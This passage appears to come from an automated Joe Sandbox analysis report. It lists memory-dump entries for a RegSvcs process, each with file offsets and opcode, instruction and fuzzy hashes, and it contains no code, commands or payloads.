                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b465d6b5e95274465da3e89804924a09b08a05adaba791f855c27f5027bca56d
                                                                    • Instruction ID: 425d71541a33e115ac222ae4ae2782b83d58ddc338d382734b51520463e93e90
                                                                    • Opcode Fuzzy Hash: b465d6b5e95274465da3e89804924a09b08a05adaba791f855c27f5027bca56d
                                                                    • Instruction Fuzzy Hash: 7F215B74C053899FDB11CFA9C8447DEBFF4AF0A210F24845AC5A8A7391D2386948CBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30707eaf599c50034ed8b0fb7ad5214c3f05a64a053b77d7324bd0faf7e597d4
                                                                    • Instruction ID: 73df2563ab550922b653a894b97bf3bfdfd2e304517e2f3eabf230d09b3290b5
                                                                    • Opcode Fuzzy Hash: 30707eaf599c50034ed8b0fb7ad5214c3f05a64a053b77d7324bd0faf7e597d4
                                                                    • Instruction Fuzzy Hash: 5811C1707042409FD360CF29D888E9BBBF9EF88318B1495A9E14ACB352C730EC46CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 90bace4039e50a7cbfebd6f03eb78008d7da0bf829d86dc653a6be68efcf16fc
                                                                    • Instruction ID: a388916f50e89dcecf932b432d3cfffa705517b46c5d554d6ba3c870ded61093
                                                                    • Opcode Fuzzy Hash: 90bace4039e50a7cbfebd6f03eb78008d7da0bf829d86dc653a6be68efcf16fc
                                                                    • Instruction Fuzzy Hash: 010179357042014FD710CF69D898E7AB7E6EF89254B18446DE689CF352DB72EC06CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef57f96afdd9944b582e9419b04a7490a3deea939b5c07aa575418117a524328
                                                                    • Instruction ID: 134c54e6bff2f5fa1b3b3ce758e6af293005f9cd932ce54a037c6f30ed96c8c4
                                                                    • Opcode Fuzzy Hash: ef57f96afdd9944b582e9419b04a7490a3deea939b5c07aa575418117a524328
                                                                    • Instruction Fuzzy Hash: B80181357002018FD720DF69D898E3BB7EAEF8D265B184469E689CB351DB72EC01CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158644720837.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_120d000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d87da0337f41e05a221a5c7d6fffaabad982f00018991c844dd629ada098858d
                                                                    • Instruction ID: 7c1c44e0e813469efc80956d8e6ff15f4fe8ee5472e48de4e59102afac9fb857
                                                                    • Opcode Fuzzy Hash: d87da0337f41e05a221a5c7d6fffaabad982f00018991c844dd629ada098858d
                                                                    • Instruction Fuzzy Hash: C001F7314163499BE7124AD6C8C4766BF98EF41234F18821AEE0C5A2C7D3799A41CAB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0882a792af04aa7571c564ca866f455d09ad9a0df631e11e9d1f411715553d2b
                                                                    • Instruction ID: f0f5f70fc788710daa56bba89d667234c06ac89ee69093df0a0a485492146f76
                                                                    • Opcode Fuzzy Hash: 0882a792af04aa7571c564ca866f455d09ad9a0df631e11e9d1f411715553d2b
                                                                    • Instruction Fuzzy Hash: 3111F2B5D003499FDB10DFAAC484BDEBBF4AB48314F20841AC529A7340D379A944CFA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158644720837.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_120d000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 407ec782b6caecc14f9238c9f4256f89c4e6fc164f88a519f2d2bb6251541046
                                                                    • Instruction ID: 8f0d755737e003a7232c3e4faefbd6addac96eca2ee7bf273ddbe38158b38499
                                                                    • Opcode Fuzzy Hash: 407ec782b6caecc14f9238c9f4256f89c4e6fc164f88a519f2d2bb6251541046
                                                                    • Instruction Fuzzy Hash: A3F0C271405344AEE7118E4ACCC4B62FF98EF50734F28C15AEE084B283C2799944CAB1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e68be44d37edba9f238b613a874dafde5efedbfc4613609ea9578c5ba62a6e7
                                                                    • Instruction ID: a24abbb5ed3b0ff5afcefa3546c08684472cd2502a8d05be02548c1a0da3fbe5
                                                                    • Opcode Fuzzy Hash: 6e68be44d37edba9f238b613a874dafde5efedbfc4613609ea9578c5ba62a6e7
                                                                    • Instruction Fuzzy Hash: A8F0A7B1A0C2405BD345CA18CC52E5ABBA1AFD5204F18C85ED544C73A2D623DC07C791
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dd883eedcaaaae2ff0eea062de8b475f0112d5d6a65a29aa27bc7f5a1615f1b
                                                                    • Instruction ID: 2411d826a2c58f5f59575417a1051a3b5860564381abf8faec5aae1aacbabc9a
                                                                    • Opcode Fuzzy Hash: 9dd883eedcaaaae2ff0eea062de8b475f0112d5d6a65a29aa27bc7f5a1615f1b
                                                                    • Instruction Fuzzy Hash: 6AE0DF30A16389EFC702EFB0D80156D7BF8FB06205B2041EAD408CB311EB315E05CB41
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3845a30849b7158478dcfa4a13880a3c2f2b149f0cf086507893bf9bec275fbb
                                                                    • Instruction ID: 959100f05a5df25cc817dc307bb36ef2e5597d94fec2e1f91ecb987d57d8b9c9
                                                                    • Opcode Fuzzy Hash: 3845a30849b7158478dcfa4a13880a3c2f2b149f0cf086507893bf9bec275fbb
                                                                    • Instruction Fuzzy Hash: 8BE0863590A389EFC702DFB89900449BFF59E4310071502EFD5C4CB353E9315A19DBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03160d7d908ede3cba8b8409b93ba6ae2ae3e662520c934e8ef4a0a1686f2a14
                                                                    • Instruction ID: b2b3bd473953b69973951ebbc515d50b85f6b4bbc6994edd19aeffbc62d3f570
                                                                    • Opcode Fuzzy Hash: 03160d7d908ede3cba8b8409b93ba6ae2ae3e662520c934e8ef4a0a1686f2a14
                                                                    • Instruction Fuzzy Hash: 07E0C2B690C3400FD381DA50D852AA9BBB1EF91200F0D989AE480E7347F651CC07CF20
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e981efc403b20be0b416d94b8a31306f0126edd8be4a1c2111860e7c3bfeb2d2
                                                                    • Instruction ID: cee9d5346c1e3a884dda18a7b970d8a23a5575ce53ad7db86371aa8a6e89f096
                                                                    • Opcode Fuzzy Hash: e981efc403b20be0b416d94b8a31306f0126edd8be4a1c2111860e7c3bfeb2d2
                                                                    • Instruction Fuzzy Hash: 43E08C71218380AFD34ACA888C048EABB75EB8A21071A889BE49087353D6629C07C761
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 42af8963fd9ed23af68985c3396361db4ad1f5fda7ba366acf4a77f6b2d4ab31
                                                                    • Instruction ID: 60fc423b436365c855d310001449c042d5191fc8be230ed55013566401128b59
                                                                    • Opcode Fuzzy Hash: 42af8963fd9ed23af68985c3396361db4ad1f5fda7ba366acf4a77f6b2d4ab31
                                                                    • Instruction Fuzzy Hash: BFE0723160C1008BC300FFA8DC40DDAB3B1EF82300F0484AEE84607202E730A947C7B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8859ed8481e36411d15d6b3395e2d3b39d7a2eaa6f0bc7094aafd227e9f2f7f6
                                                                    • Instruction ID: a9e9103cb492d2dd9029e089aaf6b736142a351763af20e53f18c815c2594392
                                                                    • Opcode Fuzzy Hash: 8859ed8481e36411d15d6b3395e2d3b39d7a2eaa6f0bc7094aafd227e9f2f7f6
                                                                    • Instruction Fuzzy Hash: 36E08C3A10D2828FC302CF68E940C46FFB19B9B210B18498EE0D0932A3C6219C07CB72
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a77363554e58138c439e7bcddea4fcd5f0041e23d64d632bf7258fac822dde0
                                                                    • Instruction ID: f3c875bb4435c5de181717a554ed42c72fd17defcc8c17adc4bc994f0bfeb3d5
                                                                    • Opcode Fuzzy Hash: 5a77363554e58138c439e7bcddea4fcd5f0041e23d64d632bf7258fac822dde0
                                                                    • Instruction Fuzzy Hash: DDD01730A11249EFCB41EFA4E90565EB7F9FB48204B6081A9D808D7304EB316E049B81
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc7bdc67fb80b839ab8fbb2b94e6798e7a0e9d1deb0368fc64bffcb3cb76a53c
                                                                    • Instruction ID: 6606f9aae768d393317b179108c698045349a7970ec1b753a543d4962d4ac569
                                                                    • Opcode Fuzzy Hash: cc7bdc67fb80b839ab8fbb2b94e6798e7a0e9d1deb0368fc64bffcb3cb76a53c
                                                                    • Instruction Fuzzy Hash: 20D05EB25092019FC681CE40FD42D86BBA2DFD5604F09884AA540A3351EA22CC16DB73
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e5bb7b09d9a36fb8524cd6f77f1c130163bebc51dc8b45995d348a51e2694c3
                                                                    • Instruction ID: e19a2ad7eafe93c6ec49582870772d8a52e954befba9f1db82fbc57d09f78b9c
                                                                    • Opcode Fuzzy Hash: 4e5bb7b09d9a36fb8524cd6f77f1c130163bebc51dc8b45995d348a51e2694c3
                                                                    • Instruction Fuzzy Hash: DED0127110C141DFC701CF64E550D56FFE29F99604F19888EE48457313C622DC26D722
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ca9062da17eb9aa8d1ddd9337ff91b07167167898bb4e7f2f6882c36e8e7455
                                                                    • Instruction ID: d291b7a0ac8bf5d6775398920f7b3fe1724d1ce8d5114c7db690371a64c87a5e
                                                                    • Opcode Fuzzy Hash: 5ca9062da17eb9aa8d1ddd9337ff91b07167167898bb4e7f2f6882c36e8e7455
                                                                    • Instruction Fuzzy Hash: DBD0C971D0520CEB8B00EFE9994099EB7FADB86104B1042EA9908D7211E9315F10DB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 480137ef1cb4d4016e129ee8412976a36142b94822f9268475bbf83df9eb49e7
                                                                    • Instruction ID: d3e63857088077f34ac372a32947b5b0c1ebae77d0fa10cba900a8a084adfca9
                                                                    • Opcode Fuzzy Hash: 480137ef1cb4d4016e129ee8412976a36142b94822f9268475bbf83df9eb49e7
                                                                    • Instruction Fuzzy Hash: BAD05E7910C3814FC342CB54E850856BF61AF8A204B09888AE4918B353C761DC17DF21
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 909aa07a6507455c2213df1818227931a377529a3d7f8d604f207d8dff51dbd8
                                                                    • Instruction ID: 1031eb4face7dfc1200c889efea90b4f26600efff6941cd7038c9a4d9c057a09
                                                                    • Opcode Fuzzy Hash: 909aa07a6507455c2213df1818227931a377529a3d7f8d604f207d8dff51dbd8
                                                                    • Instruction Fuzzy Hash: F7D0C7751082908BC641DF55E560E96BBE2EFC5204F198899D49487313C762D827CB65
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c9f05b00258cfc4e3d0c8214937ce65fb7b23b5c00b89a1e3707a346d946a4c
                                                                    • Instruction ID: 35335bf5d9dcbfe37c88ddd24e929956b4dbb9c9f769fe9b987dea7535abf6cb
                                                                    • Opcode Fuzzy Hash: 8c9f05b00258cfc4e3d0c8214937ce65fb7b23b5c00b89a1e3707a346d946a4c
                                                                    • Instruction Fuzzy Hash: 89D0A9726083808FD304CF40E842E42BBA2FFC4204F28C89EE44187312C732D813CB61
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158645412167.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_1260000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 293c15aefb547b32e8ea6c229d153d400cc6e626f2774e021e5d089328fbc4ff
                                                                    • Instruction ID: 399def55c0732b8f0c8c188b617bde56c19ac7af40f29103edccf8fa336b43df
                                                                    • Opcode Fuzzy Hash: 293c15aefb547b32e8ea6c229d153d400cc6e626f2774e021e5d089328fbc4ff
                                                                    • Instruction Fuzzy Hash: 34C04C7151F3844FD7030B7448110D43BB1EF5762E3DB44DAD085DB1A3D629550AC715
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 680ba514e373c83c4bd0ecd75cbf232e871d7db8a34054a3afde84230277a3c9
                                                                    • Instruction ID: ff7bfe4b84669566038969674e7166ab7ede3fe35ad43948501b824a0df18e4a
                                                                    • Opcode Fuzzy Hash: 680ba514e373c83c4bd0ecd75cbf232e871d7db8a34054a3afde84230277a3c9
                                                                    • Instruction Fuzzy Hash: 25C04CA414E3C04FD306C724DC65451BF309F47505B5C90CAE594CB2A7D61ADC07DB56
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 165bb9e052aaa0751085e1e6d3a2142f97f43a5c4f264ebc99181504699ca789
                                                                    • Instruction ID: 790f5f0b98f001be139d064168b925a8b2f1aa51918739474386730c5eabbe0a
                                                                    • Opcode Fuzzy Hash: 165bb9e052aaa0751085e1e6d3a2142f97f43a5c4f264ebc99181504699ca789
                                                                    • Instruction Fuzzy Hash: 2DC0085000F7C14FD71756285A642457FB14A53205B6A14CFD0C0CB193D159584ED722
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d5181075fff84b120cf8f7d2b8936c564e4187e6d2b6e532e7444f90a98f327
                                                                    • Instruction ID: 6abc56b61679ff42466a44c31a9617bb81594173bf9cb4d0d7ba708294bf932a
                                                                    • Opcode Fuzzy Hash: 4d5181075fff84b120cf8f7d2b8936c564e4187e6d2b6e532e7444f90a98f327
                                                                    • Instruction Fuzzy Hash: E7B012312050204B8388CA1CC881408F3A1EBC8314318C49CA408CB345CF33EC03C540
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27d13d7b09abe24bd64d3fff043d16df4008c3c47013df85615142b0afbdb460
                                                                    • Instruction ID: 510cf5168267272ef2b5b5eae1714afb2a6014c8ed9973fe73a641d7811319c9
                                                                    • Opcode Fuzzy Hash: 27d13d7b09abe24bd64d3fff043d16df4008c3c47013df85615142b0afbdb460
                                                                    • Instruction Fuzzy Hash: 15A011302000008B8A00EA00C882800B320EB80228B28C088A8288B30ACB33EA03CA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.158662584796.00000000068B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_68b0000_RegSvcs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                    • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                    • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                    • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40